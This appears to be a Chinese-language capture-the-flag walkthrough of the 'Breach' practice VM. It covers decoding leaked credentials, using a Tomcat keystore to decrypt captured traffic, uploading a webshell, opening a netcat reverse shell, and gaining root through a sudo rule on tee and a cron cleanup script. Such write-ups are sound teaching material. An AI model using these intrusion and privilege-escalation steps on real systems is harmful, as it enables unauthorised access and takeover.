打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140
打开网页http://192.168.110.140/index.html
查看源代码发现可以加密字符串
猜测base64 解密 cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 得到这个结果可能是二次加密在base64解密
得到 pgibbons:damnitfeel$goodtobeagang$ta 去除: 得到两个字符串pgibbons,damnitfeel$goodtobeagang$ta
点击图片每个路径都看看发现
可以登录 把刚刚拿到的两个密码进行尝试登录
登录成功 发现有3个邮件
192.168.110.140/.keystore 这个地址 为 ssl 加密证书的密钥库 继续搜索有用文件
发现 有信息泄露 通过邮件信息猜测 tomcat
发现 pcap 文件 为 wireshark 流量包 可以下载来分析
都是加密过的 可以利用前面的ssl 解密 利用java 的 keytool 获取证书 输入
D:\jdk\bin>keytool.exe -list -keystore
输入密钥库口令:tomcat
密钥库类型: jks
密钥库提供方: SUN
您的密钥库包含 1 个条目
tomcat, 2016-5-21, PrivateKeyEntry,
证书指纹 (SHA1): D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53
Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\jdk\keystore -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。
解密出来 结果
接着导出 p12 证书
输入
keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat
证书有了 我们就可以查看了 打开Wireshark 编辑--首选项--Protocols--SSL,点击右边的Edit:
![](https://i-blog.csdnimg.cn/blog_migrate/f2d9f0ccf768237b7f805d33a3f8047d.png)
![](https://i-blog.csdnimg.cn/blog_migrate/8ffe5dd672710418a0040b9618cef6c2.png)
![](https://i-blog.csdnimg.cn/blog_migrate/5196c5078d2f0ced21f222201f3af444.png)
这里上传马以后每隔3分钟会自动删除 所以我们直接利用他反弹一个shell 这里可以用linux 自带的也可以 用msf 生成
![](https://i-blog.csdnimg.cn/blog_migrate/2a9891456f1fc8cbd6630accbc9b886f.png)
本机 输入 nc.exe -lvp 4444
进入项目后直接可以查看项目寻找到 两个特殊文件
看到mysql 的用户密码
输入
![](https://i-blog.csdnimg.cn/blog_migrate/0e2b58437034257c67a9957c0c27cc33.png)
发现 milton 用户 去 etc/passwd
发现对应用户 猜测就是这个用户密码
![](https://i-blog.csdnimg.cn/blog_migrate/db7e8a62d00cd16d459041e2e4f12675.png)
接着查询这个用户能否sudo 执行
sudo -l
没发现可利用的 再从新找线索
uname -a
![](https://i-blog.csdnimg.cn/blog_migrate/c67e1fb2d2b0d4b2199e64881b01503d.png)
![](https://i-blog.csdnimg.cn/blog_migrate/f52f059f251a05c64eef37eb942e4a05.png)
tEXtComment 和coffeestains
利用这两个尝试登录
登录成功
blumbergh@Breach:~$ sudo -l sudo -l Matching Defaults entries for blumbergh on Breach: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User blumbergh may run the following commands on Breach: (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
能够以root 权限执行
/usr/bin/tee /usr/share/cleanup/tidyup.sh
在去查看历史命令
cd / blumbergh@Breach:/$ cd usr cd usr blumbergh@Breach:/usr$ cd share cd share blumbergh@Breach:/usr/share$ cd cleasnup cd cleasnup -su: cd: cleasnup: No such file or directory blumbergh@Breach:/usr/share$ cd cleanup cd cleanup
cat tidyup.sh
#!/bin/bash #Hacker Evasion Script #Initech Cyber Consulting, LLC #Peter Gibbons and Michael Bolton - 2016 #This script is set to run every 3 minutes as an additional defense measure against hackers. cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf
3分钟删除一次刚刚上马的路径
cat 查看
等待nc 反弹
![](https://i-blog.csdnimg.cn/blog_migrate/abca8cd99cb44cccb701868493410fd3.png)
成功 记得 python -c 'import pty;pty.spawn("/bin/bash")' 显示终端